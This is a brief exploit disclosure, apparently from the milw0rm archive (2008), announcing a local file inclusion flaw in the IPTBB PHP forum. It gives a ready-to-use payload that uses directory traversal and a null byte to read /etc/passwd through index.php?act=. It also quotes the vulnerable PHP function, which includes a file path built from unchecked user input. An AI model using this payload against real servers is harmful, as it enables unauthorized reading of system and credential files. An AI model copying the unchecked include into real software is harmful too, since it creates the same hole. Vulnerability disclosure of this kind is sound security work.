36 lines
No EOL
1.1 KiB
Text
36 lines
No EOL
1.1 KiB
Text
____ _ _ _ ___ __ _ __
|
|
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _
|
|
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
|
|
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |
|
|
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |
|
|
---------------------------------------------------------------------------|___/
|
|
Exploit found by sToRm
|
|
|
|
IPTBB is a free forum system built using PHP and mysql.
|
|
Local File Inclusion
|
|
|
|
Local File Inclusion
|
|
--------------------
|
|
|
|
index.php?act=../../../../../../etc/passwd%00
|
|
|
|
|
|
function action($page){
|
|
$page="main/".$page.".php";
|
|
//Include the template maker
|
|
//Get the settings
|
|
$setting = array();
|
|
$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");
|
|
|
|
while ( $row = mysql_fetch_array( $sql ) ){
|
|
$setting["{$row['name']}"] = $row['value'];
|
|
}
|
|
|
|
require_once('tpl.class.php');
|
|
$tpl = new template;
|
|
$fileurl = 'templates/';
|
|
$template = $setting['template'] . '/';
|
|
include($page);
|
|
}
|
|
|
|
# milw0rm.com [2008-06-20] |